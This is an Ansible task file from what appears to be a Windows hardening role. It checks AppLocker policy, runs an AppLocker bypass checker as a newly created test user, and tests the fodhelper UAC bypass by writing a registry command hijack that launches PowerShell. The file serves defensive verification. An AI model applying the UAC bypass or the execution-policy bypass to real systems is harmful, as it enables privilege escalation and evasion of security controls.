---

- name: Testing | AppLocker via powershell Get-AppLockerPolicy
  win_shell: "Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path {{ item }}"
  with_items: "{{ harden_win_testing_applocker_filepath }}"

- name: Ensure user _test is present
  win_user:
    name: _test
    state: present
    groups:
      - Users

## https://github.com/3gstudent/Bypass-Windows-AppLocker
- name: upload test script
  win_template:
    src: AppLockerBypassChecker-v1.ps1
    dest: "{{ harden_win_temp }}\\AppLockerBypassChecker-v1.ps1"
- name: AppLockerBypassChecker-v1 for user?
  win_shell: "Powershell -Exec Bypass -File {{ harden_win_temp }}\\AppLockerBypassChecker-v1.ps1 {{ item }}"
  become: yes
  become_user: _test
  with_items:
    - "C:\\Users"
    - "C:\\Program Files"
    - "C:\\Program Files (x86)"
    - "C:\\ProgramData"
    - "C:\\Windows"
  register: bypass_results
- debug: var=bypass_results

## https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
## only valid for admin users
- name: Test UAC bypass
  win_regedit:
    path: HKCU::\Software\Classes\ms-settings\Shell\Open\command
    name: "{{ item.n }}"
    data: "{{ item.d }}"
    type: string
  with_items:
    - { n: DelegateExecute, d: '' }
    - { n: '(default)', d: 'cmd /c start powershell.exe' }

- name: Test UAC bypass: launch fodhelper
  win_command: "C:\\Windows\\System32\\fodhelper.exe"
